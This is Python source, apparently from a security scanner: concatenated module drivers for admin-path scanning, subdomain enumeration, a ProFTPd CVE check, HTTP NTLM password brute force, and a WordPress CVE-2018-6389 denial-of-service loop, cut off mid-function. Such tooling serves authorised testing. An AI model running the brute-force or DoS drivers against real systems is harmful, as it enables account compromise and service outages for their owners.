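def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Run the pma_scan module against a single target.

    Calls ``test`` once; if it returns 0, starts one ``check`` thread per entry
    of ``pma_scan_list`` while keeping the live thread count below
    ``thread_number``. It then waits for the workers, bounded by
    ``timeout_sec``, and writes a "nothing found" record when the scratch file
    still holds its initial ``1``.

    Args:
        target: host or URL; ``http://`` is prepended unless its type is HTTP.
        users, passwds, ports: not used by this module.
        timeout_sec: per-request timeout; also bounds the final wait loop.
        thread_number: upper bound on concurrently running threads.
        num, total: progress counters used only in verbose messages.
        log_in_file: path of the report file that records are appended to.
        time_sleep, retries, socks_proxy: passed through to ``check``/``test``.
        language: message catalogue language.
        verbose_level: > 3 prints per-request progress; 0 suppresses the record.
        methods_args: optional overrides for ``extra_requirements_dict()``.
        scan_id, scan_cmd: copied into every log record.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the `else` branch at the bottom is unreachable and no target-type
    # validation actually happens here. Left unchanged because callers may
    # rely on other target types being accepted.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or \
            target_type(target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
        # rand useragent
        user_agent_list = [
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",
            "Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
            "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04"
            " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13",
            "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)",
            "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
            "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
            "Debian APT-HTTP/1.3 (0.8.10.3)",
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
            "Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
            "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
            "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; "
            "http://help.yahoo.com/help/us/shop/merchant/)",
            "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
            "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
            "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
        ]
        http_methods = ["GET", "HEAD"]
        user_agent = {'User-agent': random.choice(user_agent_list)}

        # requirements check: start from the defaults, overlay caller overrides
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[extra_requirement]
        extra_requirements = new_extra_requirements
        if extra_requirements["pma_scan_http_method"][0] not in http_methods:
            warn(messages(language, "dir_scan_get"))
            extra_requirements["pma_scan_http_method"] = ["GET"]
        random_agent_flag = True
        if extra_requirements["pma_scan_random_agent"][0] == "False":
            random_agent_flag = False

        threads = []
        total_req = len(extra_requirements["pma_scan_list"])
        # NOTE(review): the scratch file name is built with `random`, not
        # `tempfile`; if <load_file_path()>/tmp is writable by other local
        # users the name can be pre-created or symlinked - confirm permissions.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        trying = 0
        if target_type(target) != "HTTP":
            target = 'http://' + target
        # `== 0` rather than `is 0`: identity on ints only works by accident
        # of CPython's small-int cache.
        if test(target, retries, timeout_sec, user_agent, extra_requirements["pma_scan_http_method"][0],
                socks_proxy, verbose_level, trying, total_req, total, num, language) == 0:
            keyboard_interrupt_flag = False
            for idir in extra_requirements["pma_scan_list"]:
                if random_agent_flag:
                    user_agent = {'User-agent': random.choice(user_agent_list)}
                t = threading.Thread(
                    target=check,
                    args=(target + '/' + idir, user_agent, timeout_sec, log_in_file, language, time_sleep,
                          thread_tmp_filename, retries, extra_requirements["pma_scan_http_method"][0],
                          socks_proxy, scan_id, scan_cmd))
                threads.append(t)
                t.start()
                trying += 1
                if verbose_level > 3:
                    info(messages(language, "trying_message").format(
                        trying, total_req, num, total, target_to_host(target), "default_port", 'pma_scan'))
                # throttle: block until the live thread count drops below the cap
                while 1:
                    try:
                        if threading.activeCount() >= thread_number:
                            time.sleep(0.01)
                        else:
                            break
                    except KeyboardInterrupt:
                        keyboard_interrupt_flag = True
                        break
                if keyboard_interrupt_flag:
                    break
        else:
            warn(messages(language, "open_error").format(target))

        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) or 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                # Value comparison: with `is`, a kill_time above the small-int
                # cache never matched, so the timeout never fired.
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # Close the scratch file before it is removed below.
        with open(thread_tmp_filename) as scratch:
            thread_write = int(scratch.read().rsplit()[0])
        if thread_write == 1:
            info(messages(language, "directory_file_404").format(target, "default_port"))
            if verbose_level != 0:
                __log_into_file(
                    log_in_file, 'a',
                    json.dumps({
                        'HOST': target_to_host(target),
                        'USERNAME': '',
                        'PASSWORD': '',
                        'PORT': '',
                        'TYPE': 'pma_scan',
                        'DESCRIPTION': messages(language, "phpmyadmin_dir_404"),
                        'TIME': now(),
                        'CATEGORY': "scan",
                        'SCAN_ID': scan_id,
                        'SCAN_CMD': scan_cmd
                    }) + '\n', language)
        os.remove(thread_tmp_filename)
    else:
        warn(messages(language, "input_target_error").format('pma_scan', target))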
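def start(
    target,
    users,
    passwds,
    ports,
    timeout_sec,
    thread_number,
    num,
    total,
    log_in_file,
    time_sleep,
    language,
    verbose_level,
    socks_proxy,
    retries,
    methods_args,
    scan_id,
    scan_cmd,
):
    """Run the admin_scan module against a single target.

    Calls ``test`` once; if it returns 0, starts one ``check`` thread per entry
    of ``admin_scan_list`` while keeping the live thread count below
    ``thread_number``. It then waits for the workers, bounded by
    ``timeout_sec``, and emits a "nothing found" record when the scratch file
    still holds its initial ``1`` and ``verbose_level`` is non-zero.

    ``users``, ``passwds`` and ``ports`` are not used by this module;
    ``methods_args`` optionally overrides entries of
    ``extra_requirements_dict()``; ``scan_id`` and ``scan_cmd`` are copied into
    the log record.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if (
        target_type(target) != "SINGLE_IPv4"
        or target_type(target) != "DOMAIN"
        or target_type(target) != "HTTP"
        or target_type(target) != "SINGLE_IPv6"
    ):
        # rand useragent
        user_agent_list = useragents.useragents()
        http_methods = ["GET", "HEAD"]
        user_agent = {"User-agent": random.choice(user_agent_list)}

        # requirements check: start from the defaults, overlay caller overrides
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[
                        extra_requirement
                    ]
        extra_requirements = new_extra_requirements
        if extra_requirements["admin_scan_http_method"][0] not in http_methods:
            warn(messages(language, "admin_scan_get"))
            extra_requirements["admin_scan_http_method"] = ["GET"]
        random_agent_flag = True
        if extra_requirements["admin_scan_random_agent"][0] == "False":
            random_agent_flag = False

        threads = []
        total_req = len(extra_requirements["admin_scan_list"])
        # NOTE(review): scratch file name comes from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = "{}/tmp/thread_tmp_".format(
            load_file_path()
        ) + "".join(
            random.choice(string.ascii_letters + string.digits)
            for _ in range(20)
        )
        __log_into_file(thread_tmp_filename, "w", "1", language)
        trying = 0
        if target_type(target) != "HTTP":
            target = 'http://' + target
        if test(str(target), retries, timeout_sec, user_agent,
                extra_requirements["admin_scan_http_method"][0],
                socks_proxy, verbose_level, trying, total_req, total, num,
                language) == 0:
            keyboard_interrupt_flag = False
            for idir in extra_requirements["admin_scan_list"]:
                # time.sleep(0.001)
                if random_agent_flag:
                    user_agent = {'User-agent': random.choice(user_agent_list)}
                # normalise so base and path are joined by exactly one "/"
                if target.endswith("/"):
                    target = target[:-1]
                if idir.startswith("/"):
                    idir = idir[1:]
                t = threading.Thread(target=check, args=(
                    target + "/" + idir, user_agent, timeout_sec,
                    log_in_file, language, time_sleep, thread_tmp_filename,
                    retries, extra_requirements["admin_scan_http_method"][0],
                    socks_proxy, scan_id, scan_cmd))
                threads.append(t)
                t.start()
                trying += 1
                if verbose_level > 3:
                    info(
                        messages(language, "trying_message").format(
                            trying,
                            total_req,
                            num,
                            total,
                            target_to_host(target),
                            "default_port",
                            "admin_scan",
                        )
                    )
                # throttle: block until the live thread count drops below the cap
                while 1:
                    try:
                        if threading.activeCount() >= thread_number:
                            time.sleep(0.01)
                        else:
                            break
                    except KeyboardInterrupt:
                        keyboard_interrupt_flag = True
                        break
                if keyboard_interrupt_flag:
                    break
        else:
            warn(messages(language, "open_error").format(target))

        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) or 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # Close the scratch file handle before the file is removed below; the
        # original left it to the garbage collector.
        with open(thread_tmp_filename) as scratch:
            thread_write = int(scratch.read().rsplit()[0])
        if thread_write == 1:
            if verbose_level != 0:
                data = {
                    'HOST': target_to_host(target),
                    'USERNAME': '',
                    'PASSWORD': '',
                    'PORT': '',
                    'TYPE': 'admin_scan',
                    'DESCRIPTION': messages(language, "directory_file_404").format(target, "default_port"),
                    'TIME': now(),
                    'CATEGORY': "scan",
                    'SCAN_ID': scan_id,
                    'SCAN_CMD': scan_cmd,
                }
                info(messages(language, "directory_file_404").format(target, "default_port"),
                     log_in_file, "a", data, language, thread_tmp_filename)
                __log_into_file(log_in_file, 'a', json.dumps(data), language)
        os.remove(thread_tmp_filename)
    else:
        warn(
            messages(language, "input_target_error").format(
                "admin_scan", target
            )
        )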
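def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Run the Proftpd_directory_traversal_vuln check against a single target.

    Starts one ``__directory_traversal`` thread per port while keeping the live
    thread count below ``thread_number``, waits for the workers (bounded by
    ``timeout_sec``) and, when the scratch file still holds its initial ``1``
    and ``verbose_level`` is non-zero, logs a "no vulnerability found" record
    for CVE-2010-3867.

    ``users``, ``passwds`` and ``retries`` are not used by this module;
    ``ports`` falls back to ``Proftpd_vuln_ports`` when None; ``methods_args``
    optionally overrides entries of ``extra_requirements_dict()``.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP':
        # requirements check: start from the defaults, overlay caller overrides
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[extra_requirement]
        extra_requirements = new_extra_requirements
        if ports is None:
            ports = extra_requirements["Proftpd_vuln_ports"]
        if target_type(target) == 'HTTP':
            target = target_to_host(target)

        threads = []
        total_req = len(ports)
        # NOTE(review): scratch file name comes from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        trying = 0
        keyboard_interrupt_flag = False
        for port in ports:
            port = int(port)
            t = threading.Thread(
                target=__directory_traversal,
                args=(target, int(port), timeout_sec, log_in_file, language, time_sleep,
                      thread_tmp_filename, socks_proxy, scan_id, scan_cmd))
            threads.append(t)
            t.start()
            trying += 1
            if verbose_level > 3:
                info(messages(language, "trying_message").format(
                    trying, total_req, num, total, target, port, 'Proftpd_directory_traversal_vuln'))
            # throttle: block until the live thread count drops below the cap
            while 1:
                try:
                    if threading.activeCount() >= thread_number:
                        time.sleep(0.01)
                    else:
                        break
                except KeyboardInterrupt:
                    keyboard_interrupt_flag = True
                    break
            if keyboard_interrupt_flag:
                break

        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) or 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                # Value comparison: with `is`, a kill_time above CPython's
                # small-int cache never matched, so the timeout never fired.
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # Close the scratch file before it is removed below.
        with open(thread_tmp_filename) as scratch:
            thread_write = int(scratch.read().rsplit()[0])
        if thread_write == 1 and verbose_level != 0:
            info(messages(language, "no_vulnerability_found").format('ProFTPd_directory_traversal CVE-2010-3867'))
            data = json.dumps({
                'HOST': target,
                'USERNAME': '',
                'PASSWORD': '',
                'PORT': '',
                'TYPE': 'Proftpd_directory_traversal_vuln',
                'DESCRIPTION': messages(language, "no_vulnerability_found").format(
                    'ProFTPd_directory_traversal CVE-2010-3867'),
                'TIME': now(),
                'CATEGORY': "scan",
                'SCAN_ID': scan_id,
                'SCAN_CMD': scan_cmd})
            __log_into_file(log_in_file, 'a', data, language)
        os.remove(thread_tmp_filename)
    else:
        warn(messages(language, "input_target_error").format('Proftpd_directory_traversal_vuln', target))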
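def __get_subs(
        target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, num, total,
        extra_requirements=extra_requirements_dict(),
        headers={
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
                          '(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
        }):
    """Collect subdomains of ``target`` from the enabled lookup workers.

    Starts one thread per source whose ``subdomain_scan_use_*`` flag is the
    string ``'True'``, waits for them (optionally bounded by
    ``subdomain_scan_time_limit_seconds``) and returns the de-duplicated,
    whitespace-separated tokens found in the shared scratch file.

    Returns:
        list of unique strings, or ``[]`` when the scratch file cannot be read
        (this function never creates it itself).
    """
    # NOTE(review): both defaults are evaluated once at import time and shared
    # between calls; a worker that mutates `headers` affects later scans.
    # NOTE(review): the worker names suggest third-party lookup services, so
    # the queried domain is presumably disclosed to them - confirm.
    sources = (
        ('subdomain_scan_use_netcraft', '(subdomain_scan - netcraft)', __netcraft),
        ('subdomain_scan_use_ptrarchive', 'subdomain_scan - ptrarchive', __ptrarchive),
        ('subdomain_scan_use_threatcrowd', 'subdomain_scan - threatcrowd', __threatcrowd),
        ('subdomain_scan_use_virustotal', 'subdomain_scan - virustotal', __virustotal),
        ('subdomain_scan_use_comodo_crt', 'subdomain_scan - comodo crt', __comodo_crt),
        ('subdomain_scan_use_dnsdumpster', 'subdomain_scan - dnsdumpster', __dnsdumpster),
        ('subdomain_scan_use_google_dig', '(subdomain_scan - google dig)', __google_dig),
        ('subdomain_scan_use_cert_spotter', '(subdomain_scan - cert spotter)', __cert_spotter),
    )
    trying = 0
    threads = []
    # NOTE(review): scratch file name comes from `random`, not `tempfile`;
    # confirm <load_file_path()>/tmp is not writable by other local users.
    thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
        random.choice(string.ascii_letters + string.digits) for _ in range(20))
    # every option whose first value is 'True' counts towards the progress total
    total_req = sum(1 for key in extra_requirements if extra_requirements[key][0] == 'True')

    for flag, label, worker in sources:
        if extra_requirements[flag][0] != 'True':
            continue
        trying += 1
        if verbose_level > 3:
            info(messages(language, "trying_process").format(trying, total_req, num, total, target, label))
        t = threading.Thread(
            target=worker,
            args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level,
                  socks_proxy, retries, headers, thread_tmp_filename))
        # the original appended every thread twice; once is enough
        threads.append(t)
        t.start()

    # wait for threads
    kill_switch = 0
    try:
        # The original indexed the key string itself (`"..."[0]`), which always
        # raised and silently disabled the limit. -1 means "no limit".
        limit_seconds = int(extra_requirements["subdomain_scan_time_limit_seconds"][0])
        kill_time = -1 if limit_seconds == -1 else int(limit_seconds / 0.1)
    except (KeyError, IndexError, TypeError, ValueError):
        kill_time = -1
    while 1:
        time.sleep(0.1)
        kill_switch += 1
        try:
            # value comparison: `is` on ints only works for CPython's cached small ints
            if threading.activeCount() == 1 or (kill_time != -1 and kill_switch == kill_time):
                break
        except KeyboardInterrupt:
            break
    try:
        with open(thread_tmp_filename) as scratch:
            subs = list(set(scratch.read().rsplit()))
        os.remove(thread_tmp_filename)
    except Exception:
        # best effort: the file is absent when no worker wrote a result
        subs = []
    return subs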
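def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Run the http_ntlm_brute module against a single target.

    For every port on which ``check_auth`` returns a falsy value, starts one
    ``login`` thread per (user, password) pair while keeping the live thread
    count below ``thread_number``. It then waits for the workers (bounded by
    ``timeout_sec``) and, when the scratch file still holds its initial ``1``
    and ``verbose_level`` is non-zero, appends a "no user/passwords" record.

    ``users``, ``passwds`` and ``ports`` fall back to the ``http_ntlm_brute_*``
    entries of the requirements dict when None; ``methods_args`` optionally
    overrides entries of ``extra_requirements_dict()``.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP':
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[extra_requirement]
        extra_requirements = new_extra_requirements
        if users is None:
            users = extra_requirements["http_ntlm_brute_users"]
        if passwds is None:
            passwds = extra_requirements["http_ntlm_brute_passwds"]
        if ports is None:
            ports = extra_requirements["http_ntlm_brute_ports"]
        if not target.lower().startswith(('http://', 'https://')):
            target = 'http://' + str(target)

        threads = []
        total_req = len(users) * len(passwds)
        # NOTE(review): scratch file names come from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        curl_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        __log_into_file(curl_tmp_filename, 'w', '', language)
        trying = 0
        keyboard_interrupt_flag = False
        for port in ports:
            if check_auth(target, timeout_sec, language, port):
                continue
            for user in users:
                for passwd in passwds:
                    t = threading.Thread(target=login, args=(
                        user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep,
                        thread_tmp_filename, curl_tmp_filename, socks_proxy, scan_id, scan_cmd))
                    threads.append(t)
                    t.start()
                    trying += 1
                    if verbose_level > 3:
                        info(messages(language, "trying_message").format(
                            trying, total_req, num, total, target, port, 'http_ntlm_brute'))
                    # throttle: block until the live thread count drops below the cap
                    while 1:
                        try:
                            if threading.activeCount() >= thread_number:
                                time.sleep(0.01)
                            else:
                                break
                        except KeyboardInterrupt:
                            keyboard_interrupt_flag = True
                            break
                    if keyboard_interrupt_flag:
                        break
                if keyboard_interrupt_flag:
                    break
            if keyboard_interrupt_flag:
                break

        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) or 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                # Value comparison: with `is`, a kill_time above CPython's
                # small-int cache never matched, so the timeout never fired.
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # Close the scratch file before it is removed below.
        with open(thread_tmp_filename) as scratch:
            thread_write = int(scratch.read().rsplit()[0])
        if thread_write == 1 and verbose_level != 0:
            data = json.dumps({
                'HOST': target,
                'USERNAME': '',
                'PASSWORD': '',
                'PORT': '',
                'TYPE': 'http_ntlm_brute',
                'DESCRIPTION': messages(language, "no_user_passwords"),
                'TIME': now(),
                'CATEGORY': "brute",
                'SCAN_ID': scan_id,
                'SCAN_CMD': scan_cmd}) + "\n"
            __log_into_file(log_in_file, 'a', data, language)
        os.remove(thread_tmp_filename)
        os.remove(curl_tmp_filename)
    else:
        warn(messages(language, "input_target_error").format('http_ntlm_brute', target))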
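def __go_for_attacks(targets, check_ranges, check_subdomains, log_in_file, time_sleep, language, verbose_level,
                     retries, socks_proxy, users, passwds, timeout_sec, thread_number, ports, ping_flag,
                     methods_args, backup_ports, scan_method, thread_number_host, graph_flag, profile, api_flag):
    """
    Prepare the scan and manage one process per (target, module) pair.

    Args:
        targets: list of calculated targets
        check_ranges: check IP range flag
        check_subdomains: check subdomain flag
        log_in_file: output filename
        time_sleep: time sleep seconds
        language: language
        verbose_level: verbose level number
        retries: retries number
        socks_proxy: socks proxy address
        users: usernames
        passwds: passwords
        timeout_sec: timeout seconds
        thread_number: thread numbers
        ports: port numbers
        ping_flag: ping before scan flag
        methods_args: method args for modules
        backup_ports: port numbers (backup)
        scan_method: selected module names
        thread_number_host: maximum number of concurrently running processes
        graph_flag: graph name
        profile: profile name
        api_flag: API flag

    Returns:
        True when it ends
    """
    # NOTE(review): both scratch paths are built from a timestamp plus
    # `random` output rather than `tempfile`; confirm <load_file_path()>/tmp
    # is not writable by other local users.
    suff = now(model="%Y_%m_%d_%H_%M_%S") + "".join(
        random.choice(string.ascii_lowercase) for _ in range(10))
    subs_temp = "{}/tmp/subs_temp_".format(load_file_path()) + suff
    range_temp = "{}/tmp/ranges_".format(load_file_path()) + suff

    # First pass over analysis() only counts the targets for progress output.
    total_targets = sum(1 for _ in analysis(
        targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
        language, verbose_level, retries, socks_proxy, True)) * len(scan_method)
    try:
        os.remove(range_temp)
    except OSError:
        # the counting pass does not always leave a ranges file behind
        pass
    targets = analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
                       language, verbose_level, retries, socks_proxy, False)
    trying = 0
    # NOTE(review): scan_id is drawn from `random`; fine as a report label,
    # not as an unguessable token - confirm how the API uses it.
    scan_id = "".join(random.choice("0123456789abcdef") for _ in range(32))
    # NOTE(review): on the CLI path scan_cmd is the raw command line and is
    # handed to every module for logging; anything sensitive passed as an
    # argument ends up in the report - confirm that is intended.
    scan_cmd = messages(language, 158) if api_flag else " ".join(sys.argv)
    for target in targets:
        for sm in scan_method:
            trying += 1
            p = multiprocessing.Process(
                target=start_attack,
                args=(str(target).rsplit()[0], trying, total_targets, sm, users, passwds, timeout_sec,
                      thread_number, ports, log_in_file, time_sleep, language, verbose_level, socks_proxy,
                      retries, ping_flag, methods_args, scan_id, scan_cmd))
            p.name = str(target) + "->" + sm
            p.start()
            # Throttle on the number of live children. The original removed
            # items from the list while iterating it, which skips entries and
            # can under-count, letting the process cap be exceeded.
            while 1:
                alive = sum(1 for process in multiprocessing.active_children() if process.is_alive())
                if alive >= thread_number_host:
                    time.sleep(0.01)
                else:
                    break

    _waiting_for = 0
    while 1:
        try:
            exitflag = True
            # `!= 0` rather than `is not 0`: compare values, not identities
            if len(multiprocessing.active_children()) != 0:
                exitflag = False
                _waiting_for += 1
            if _waiting_for > 3000:
                # periodic reminder of which children are still running
                _waiting_for = 0
                info(messages(language, 138).format(
                    ", ".join([p.name for p in multiprocessing.active_children()])))
            time.sleep(0.01)
            if exitflag:
                break
        except KeyboardInterrupt:
            for process in multiprocessing.active_children():
                process.terminate()
            break
    info(messages(language, 42))
    os.remove(subs_temp)
    os.remove(range_temp)
    info(messages(language, 43))
    sort_logs(log_in_file, language, graph_flag, scan_id, scan_cmd, verbose_level, 0, profile, scan_method,
              backup_ports)
    write("\n")
    info(messages(language, 44))
    write("\n\n")
    finish()
    return True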
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):  # Main function
    """Run the wordpress_dos_cve_2018_6389_vuln module against a single target.

    Builds a URL from ``target``, calls ``test`` once and returns early unless
    it yields 0, then starts a background ``test`` thread and a series of
    ``send_dos`` threads, keeping the live thread count below
    ``thread_number``. ``limit`` is 1000 iterations unless the ``*_no_limit``
    option is anything other than ``"False"``, in which case it is -1.

    ``users``, ``passwds`` and ``ports`` are not used by this module.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(
            target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
        # rand useragent
        user_agent_list = [
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",
            "Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
            "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04"
            " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13",
            "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)",
            "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
            "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
            "Debian APT-HTTP/1.3 (0.8.10.3)",
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
            "Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
            "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
            "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; "
            "http://help.yahoo.com/help/us/shop/merchant/)",
            "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
            "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
            "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
        ]
        user_agent = {'User-agent': random.choice(user_agent_list)}
        limit = 1000
        # requirements check
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[extra_requirement]
        extra_requirements = new_extra_requirements
        random_agent_flag = True
        # Only the exact string "True" keeps the random agent enabled.
        if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][0] != "True":
            random_agent_flag = False
        # Any value other than the exact string "False" removes the iteration
        # cap, so a typo in this option also selects the unbounded mode.
        if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][0] != "False":
            limit = -1
        threads = []
        total_req = limit
        # NOTE(review): `filepath` is assigned but never read in this function.
        filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
        # NOTE(review): scratch file name comes from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        trying = 0
        if target_type(target) == 'SINGLE_IPv4' or target_type(target) == 'DOMAIN':
            url = 'http://{0}/'.format(target)
        else:
            if target.count(':') > 1:
                __die_failure(messages(language, 105))
            http = target.rsplit('://')[0]
            host = target_to_host(target)
            path = "/".join(target.replace('http://', '').replace('https://', '').rsplit('/')[1:])
            url = http + '://' + host + '/' + path
        # NOTE(review): `is`/`is not` on int literals here and below compares
        # identity, which only works for CPython's cached small ints; with
        # `kill_switch is kill_time` the wait loop's timeout cannot fire once
        # kill_time exceeds that cache.
        if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num,
                language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) is not 0:
            warn(messages(language, 109).format(url))
            return
        info(messages(language, 177).format(target))
        n = 0
        # Background `test` thread; it differs from the call above only in the
        # boolean argument (True instead of False).
        t = threading.Thread(target=test,
                             args=(
                                 url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req,
                                 total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename))
        t.start()
        keyboard_interrupt_flag = False
        # With limit == -1 this condition never becomes false; the only exit
        # is then the KeyboardInterrupt path below.
        while (n != limit):
            n += 1
            if random_agent_flag:
                user_agent = {'User-agent': random.choice(user_agent_list)}
            t = threading.Thread(target=send_dos,
                                 args=(url, user_agent, timeout_sec, log_in_file, language,
                                       time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd))
            threads.append(t)
            t.start()
            trying += 1
            if verbose_level > 3:
                # NOTE(review): `port` is not defined anywhere in this
                # function, so this line raises NameError when
                # verbose_level > 3 (unless a module-level `port` exists).
                info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), port,
                                                   'wordpress_dos_cve_2018_6389_vuln'))
            try:
                # A 0 in the scratch file stops the bounded run early.
